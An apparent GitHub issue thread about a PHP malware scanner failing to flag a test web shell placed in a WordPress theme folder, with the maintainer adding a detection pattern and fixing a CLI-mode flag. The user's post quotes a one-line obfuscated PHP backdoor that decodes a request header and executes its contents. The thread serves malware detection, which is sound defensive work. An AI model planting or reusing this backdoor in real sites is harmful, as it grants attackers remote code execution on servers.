search

scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0
556 stars 96 forks source link

Does not recognize malware with PHP script #72

Closed paulijmker closed 2 years ago

paulijmker commented 2 years ago

I got the scanner running via PHP. I have added a file called "cyb3rsh3ll.php" in the theme folder of WordPress. Inside the PHP code:

<?$x=explode('~',base64_decode(substr(numberheaders()['x'],1)));@$x[0]($x[1]);

This already looks like Mailware but when I run the test I get no error message, just OK???

My full script: $scan = new MalwareScaner(); $scan->setExtensions(array('.php', '.js')); $scan->addWordpressChecksums('5.9.2'); $scan->setFlagHideWhitelist(true); $scan->setFlagHideOk(true); $scan->setFlagCombinedWhitelist(true); $scan->run(ABSPATH);

Also I see that the script with above code is executed twice. A full printout with all results and a printout with only the ER results, how to solve this?

result:

... (loading all the OK and ER descriptions) # OK # {/home/domain/domains/domain.nl/public_html/xmlrpc.php} # OK # {/home/domain/domains/domain.nl/public_html/wp-comments-post.php} # OK # {/home/domain/domains/domain.nl/public_html/wp-links-opml.php} # OK # {/home/domain/domains/domain.nl/public_html/wp-config.php} Start time: 2022-03-24 15:36:48 End time: 2022-03-24 15:36:54 Total execution time: 6 Base directory: /home/domain/domains/domain.nl/public_html Total directories scanned: 614 Total files scanned: 2092 Total malware identified: 3 Combined whitelist records count: 88134

# ER # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/seo-by-rank-math/assets/vendor/select2/select2.min.js} # ER # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php} Start time: 2022-03-24 15:36:57 End time: 2022-03-24 15:37:01 Total execution time: 4 Base directory: /home/domain/domains/domain.nl/public_html/ Total directories scanned: 1228 Total files scanned: 4826 Total malware identified: 5

scr34m commented 2 years ago

The code part @$x[0]($x[1]); looks really odd will add a pattern for it.

What is yours script name? Maybe this cause some interference, but will look into this issue too shortly.

scr34m commented 2 years ago

You have to specify the false flag to tell not in CLI mode ex.: $scan = new MalwareScanner(false);

scr34m commented 2 years ago

Definitions updated.

paulijmker commented 2 years ago

Thank you, it's working now!!